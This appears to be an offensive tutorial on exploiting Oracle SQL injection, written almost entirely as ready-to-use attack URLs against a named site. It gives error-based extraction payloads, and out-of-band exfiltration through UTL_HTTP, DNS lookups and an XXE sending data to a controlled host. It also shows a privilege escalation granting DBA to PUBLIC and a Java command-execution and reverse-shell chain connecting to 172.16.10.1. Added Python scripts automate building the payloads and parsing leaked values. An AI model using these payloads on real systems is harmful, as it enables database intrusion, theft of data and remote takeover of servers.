Oracle SQL Injection Exploitation Methods

Several ways of error-based injection

0x1 utl_inaddr.get_host_name

This method requires no special privileges on Oracle 8i, 9i and 10g. From 11g onward Oracle added fine-grained network access control (ACLs managed through DBMS_NETWORK_ACL_ADMIN), so on 11g and later the current database user must hold a network ACL that permits host resolution before utl_inaddr can be used for error-based injection.

http://www.iswin.org/oracle.jsp?name=' and 1=utl_inaddr.get_host_name((select user from dual))--

0x2 ctxsys.drithsx.sn

http://www.iswin.org/oracle.jsp?name=' and 1=ctxsys.drithsx.sn(1,(select user from dual))--

 

0x3 XMLType

Many people do not know why chr(60) is used in the XMLType payload. Looking the values up with ascii(): 60 is '<', 58 is ':' and 62 is '>', so the concatenation builds the string <:VALUE>. The XML parser rejects an element name that begins with a colon as an invalid QName and echoes the offending name in its error message, which is what leaks the query result; the colon is what guarantees the name is invalid. Note also that if the returned data contains spaces the name ends at the first space and the rest of the value is lost. Wrap the subquery in replace() to substitute a non-space character before concatenating it.

http://www.iswin.org/oracle.jsp?name=' and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null--

0x4 dbms_xdb_version.checkin

http://www.iswin.org/oracle.jsp?name=' and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null--

0x5 dbms_xdb_version.makeversioned

http://www.iswin.org/oracle.jsp?name=' and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null--

0x6 dbms_xdb_version.uncheckout

http://www.iswin.org/oracle.jsp?name=' and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null--

0x7 dbms_utility.sqlid_to_sqlhash

http://www.iswin.org/oracle.jsp?name=' and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null--
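The following is an added example, not code from the original post. It builds the payloads of 0x1 to 0x3 from a plain subquery, pages long values through substr() because error messages and hostnames are length-limited, and extracts the leaked value from the Oracle error text. The error wording in the regular expressions is assumed from typical Oracle output and the sample error strings are constructed, not captured from a real target.

```python
import re

# Added example (not from the original post). Builds the error-based payloads of
# 0x1 to 0x3 and pulls the leaked value back out of the Oracle error text.
# Assumptions: the injected parameter is a string literal closed with a single
# quote (as in the post's "name=" examples) and the error wording matches typical
# Oracle output. The sample error strings below are constructed, not captured.


def chr_concat(s: str) -> str:
    """Encode a literal as chr(n)||chr(n)... so the payload needs no quote characters."""
    return "||".join(f"chr({ord(c)})" for c in s)


def paged(subquery: str, page: int = 0, size: int = 60) -> str:
    """Slice a possibly long result into fixed windows; error messages and hostnames
    are length-limited, so long values are read back one page at a time."""
    return f"substr(({subquery}),{page * size + 1},{size})"


def get_host_name_payload(subquery: str) -> str:
    """0x1: utl_inaddr.get_host_name echoes the unknown host name in ORA-29257."""
    return f"' and 1=utl_inaddr.get_host_name(({subquery}))--"


def drithsx_payload(subquery: str) -> str:
    """0x2: ctxsys.drithsx.sn echoes the value as a missing thesaurus name."""
    return f"' and 1=ctxsys.drithsx.sn(1,({subquery}))--"


def xmltype_payload(subquery: str) -> str:
    """0x3: build <:VALUE>; the leading colon makes the element name an invalid
    QName, so the XML parser fails and repeats the name. A space would end the
    name early, so spaces are replaced with '_' (chr(95)) before concatenation."""
    value = f"replace(({subquery}),chr(32),chr(95))"
    return (f"' and (select upper(XMLType({chr_concat('<:')}||{value}||{chr_concat('>')})) "
            f"from dual) is not null--")


# Error lines produced by each technique; the capture group is the leaked value.
# Wording is assumed from typical Oracle output; adjust to what the target returns.
ERROR_PATTERNS = [
    re.compile(r'ORA-29257: host (\S+) unknown'),                              # 0x1
    re.compile(r'DRG-11701: thesaurus (\S+) does not exist'),                  # 0x2
    re.compile(r'LPX-00110: Warning: invalid QName ":([^"]*)"'),               # 0x3
    re.compile(r'ORA-31001: Invalid resource handle or path name "([^"]*)"'),  # 0x4 to 0x6
]


def extract_leak(error_text: str):
    """Return the value leaked through the error text, or None if nothing matches."""
    for pattern in ERROR_PATTERNS:
        match = pattern.search(error_text)
        if match:
            return match.group(1)
    return None


if __name__ == "__main__":
    # Constructed sample of the error page the XMLType payload produces.
    sample = ('ORA-31011: XML parsing failed\n'
              'ORA-19202: Error occurred in XML processing\n'
              'LPX-00110: Warning: invalid QName ":SCOTT" (not a Name)\n'
              'Error at line 1')
    print(xmltype_payload(paged("select banner from sys.v_$version where rownum=1")))
    print(extract_leak(sample))
```

Each payload function takes the subquery as written on the page, so paged() can be composed with any of them to walk a long value such as the version banner sixty characters at a time.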

Use of UTL_HTTP.request

Through utl_http.request we can send the query result to a remote server we control, which is very useful with blind injection. To use this method the database user needs execute on utl_http and, on 11g and later, a network ACL that allows the connection to that host. Values containing spaces (such as the banner) should have the spaces replaced or be hex-encoded first, or the URL will be malformed.

http://www.iswin.org/oracle.jsp?name=' and (UTL_HTTP.request('http://www.iswin.org:80/'||(select banner from sys.v_$version where rownum=1))=1--

UTL_INADDR.GET_HOST_ADDRESS & SYS.DBMS_LDAP.INIT

In many cases the database server is separated from the web server and cannot reach the Internet directly, but DNS resolution is often still allowed. Both UTL_INADDR.GET_HOST_ADDRESS and SYS.DBMS_LDAP.INIT resolve the host name they are given, so a query result concatenated into a subdomain of a zone you control appears in that zone's DNS logs whether or not the connection itself succeeds. On 11g and later these packages are also subject to the network ACLs. DBMS_LDAP.INIT takes the port number as its second argument:

http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_LDAP.INIT((select user from dual)||'.iswin.org',80) from dual) is not null--

 

Oracle XXE (CVE-2014-6577)

Affected versions: 11.2.0.3, 11.2.0.4, 12.1.0.1 and 12.1.0.2

Exploiting this XXE has the same effect as UTL_HTTP: the data is transmitted to a remote server through the URL of an external parameter entity. The difference is that extractvalue() can be used by every database user, so there is no privilege problem, which makes it a good option when a low-privileged user has no UTL_HTTP access. The flaw was fixed in Oracle's January 2015 Critical Patch Update.

http://www.iswin.org/oracle.jsp?name=' and (select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://172.16.10.1:8080/'||(SELECT user from dual)||'"> %remote;]>'),'/l') from dual) is not null--

 

Oracle Privilege Escalation Vulnerability

GET_DOMAIN_INDEX_TABLES function injection vulnerability

Versions Affected: Oracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1 - 10.2.0.2

The cause of the vulnerability is that one of the function's parameters is concatenated into dynamic SQL. The function belongs to SYS and runs with definer's rights, so whatever is injected through that parameter executes as SYS, and EXECUTE on the function is granted to PUBLIC. Any Oracle injection point on an unpatched version can therefore be escalated to the highest privilege.

Privilege escalation

http://www.iswin.org/oracle.jsp?name=' and (SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant dba to public'''';END;'';END;--','SYS',0,'1',0)) is not null--

 

Once privileges have been escalated there is a lot you can do. Because Oracle can execute Java code inside the database, what you do after escalation depends mostly on your own Java skills. A few common ways of using it are given here.

Command execution

Create the Java code

http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "Command" as import java.io.*;public class Command{public static String exec(String cmd) throws Exception{String sb="";BufferedInputStream in = new BufferedInputStream(Runtime.getRuntime().exec(cmd).getInputStream());BufferedReader inBr = new BufferedReader(new InputStreamReader(in));String lineStr;while ((lineStr = inBr.readLine()) != null)sb+=lineStr+"\n";inBr.close();in.close(); return sb;}}'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

Grant the Java execute permission

http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

Create the function

http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function cmd(p_cmd in varchar2) return varchar2 as language java name ''''''''Command.exec(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

Grant execute on the function

http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on cmd to public'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

Execute the command

The function was created by SYS, hence sys.cmd. The "is not null" test only runs the command; to read its output, feed sys.cmd(...) into one of the error-based or out-of-band methods above instead of the "select user from dual" subquery.

http://www.iswin.org/oracle.jsp?name=' and (select sys.cmd('cmd.exe /c whoami') from dual) is not null--

Reverse shell

Create the Java code

When running single commands is not much help, we can bounce back an interactive shell, which is far more convenient. The class below connects to 172.16.10.1:80 and pipes cmd.exe through the socket (a Windows target). Runtime.exec needs the java.io.FilePermission execute grant from the command-execution section in addition to the socket permission granted below, and run() returns String so that it matches the call specification created afterwards.

http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "shell" as import java.io.*;import java.net.*;public class shell{public static String run() throws Exception {Socket s = new Socket("172.16.10.1", 80);Process p = Runtime.getRuntime().exec("cmd.exe");new T(p.getInputStream(), s.getOutputStream()).start();new T(p.getErrorStream(), s.getOutputStream()).start();new T(s.getInputStream(), p.getOutputStream()).start();return "";}static class T extends Thread {private InputStream i;private OutputStream u;public T(InputStream in, OutputStream out) {this.u = out;this.i = in;}public void run() {BufferedReader n = new BufferedReader(new InputStreamReader(i));BufferedWriter w = new BufferedWriter(new OutputStreamWriter(u));char f[] = new char[8192];int l;try {while ((l = n.read(f, 0, f.length)) > 0) {w.write(f, 0, l);w.flush();}} catch (IOException e) {}try {if (n != null)n.close();if (w != null)w.close();} catch (Exception e) {}}}}'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

Grant the Java socket permission

PUBLIC is granted java.net.SocketPermission on '*' (any host and port) with the connect and resolve actions, which is what the outbound connection needs.

http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.net.SocketPermission'''''''', ''''''''*'''''''', ''''''''connect,resolve'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

Create the function

http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function reversetcp RETURN VARCHAR2 as language java name ''''''''shell.run() return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

Grant execute on the function

http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on reversetcp to public'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

Trigger the reverse shell

Start a listener on 172.16.10.1:80 first, then request:

http://www.iswin.org/oracle.jsp?name=' and (select sys.reversetcp from dual) is not null--
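The following is an added example, not code from the original post. The hard part of the privilege-escalation, command-execution and reverse-shell payloads above is the quote doubling: the injected literal is nested three deep (the GET_DOMAIN_INDEX_TABLES argument, the EXECUTE IMMEDIATE block and the inner EXECUTE IMMEDIATE), so the delimiters around the statement you want to run end up as '''' and a quote inside that statement as ''''''''. The generator below produces the exact strings on the page from a plain statement and strings the four Java steps together. The site URL, the parameter name and the Command class body are taken from the page's examples; nothing here was run against a real target.

```python
from urllib.parse import quote

# Added example (not from the original post). Generates the nested-quote payloads
# for the DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES flaw from a plain
# statement, and chains the four steps used to expose a Java class as a PL/SQL
# function. SITE and the Java source are taken from the page's own examples.

SITE = "http://www.iswin.org/oracle.jsp?name="


def q(s: str) -> str:
    """One level of PL/SQL string nesting: double every single quote."""
    return s.replace("'", "''")


def dei_payload(stmt: str) -> str:
    """Injection string that makes the SYS-owned function run `stmt` as SYS.
    Level 1: the inner EXECUTE IMMEDIATE that runs stmt (autonomous, so the DDL
    commits); level 2: the block injected after closing the quoted identifier
    with a double quote; level 3: the argument literal in the outer SELECT."""
    inner = ("DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '"
             + q(stmt) + "';END;")
    arg = 'DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE \'' + q(inner) + "';END;--"
    return ("' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','"
            + q(arg) + "','SYS',0,'1',0) from dual) is not null--")


def grant_permission(permission: str, target: str, action: str) -> str:
    """dbms_java.grant_permission block giving PUBLIC the named Java permission."""
    return (f"begin dbms_java.grant_permission( 'PUBLIC', '{q(permission)}', "
            f"'{q(target)}', '{q(action)}' );end;")


def java_function_chain(class_name: str, java_source: str, permission: tuple,
                        call_spec: str, func_name: str) -> list:
    """The four steps of the command-execution and reverse-shell sections: load the
    class, grant the Java permission it needs, wrap it in a PL/SQL function (the
    call spec) and open that function to PUBLIC. Returns one payload per step."""
    return [
        dei_payload(f'create or replace and compile java source named "{class_name}" as {java_source}'),
        dei_payload(grant_permission(*permission)),
        dei_payload(call_spec),
        dei_payload(f"grant all on {func_name} to public"),
    ]


# Java source from the command-execution section, on one line as in the URLs.
COMMAND_JAVA = (
    "import java.io.*;public class Command{public static String exec(String cmd) throws Exception{"
    "String sb=\"\";BufferedInputStream in=new BufferedInputStream(Runtime.getRuntime().exec(cmd).getInputStream());"
    "BufferedReader inBr=new BufferedReader(new InputStreamReader(in));String lineStr;"
    "while((lineStr=inBr.readLine())!=null)sb+=lineStr+\"\\n\";inBr.close();in.close();return sb;}}"
)

COMMAND_CHAIN = java_function_chain(
    "Command", COMMAND_JAVA,
    ("SYS:java.io.FilePermission", "<<ALL FILES>>", "execute"),
    "create or replace function cmd(p_cmd in varchar2) return varchar2 as language java name "
    "'Command.exec(java.lang.String) return String';",
    "cmd",
)


def exec_payload(command: str) -> str:
    """Final step: call the wrapper. The 'is not null' test does not return the
    output; combine sys.cmd(...) with an error-based or out-of-band method to read it."""
    return f"' and (select sys.cmd('{q(command)}') from dual) is not null--"


def as_url(payload: str) -> str:
    """URL-encode the payload for the GET parameter, leaving nothing unencoded."""
    return SITE + quote(payload, safe="")


if __name__ == "__main__":
    print(as_url(dei_payload("grant dba to public")))
    for step in COMMAND_CHAIN:
        print(as_url(step))
    print(as_url(exec_payload("cmd.exe /c whoami")))
```

The reverse-shell chain is the same call with the shell class as java_source, ("SYS:java.net.SocketPermission", "*", "connect,resolve") as the permission, the reversetcp call spec and "reversetcp" as func_name.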
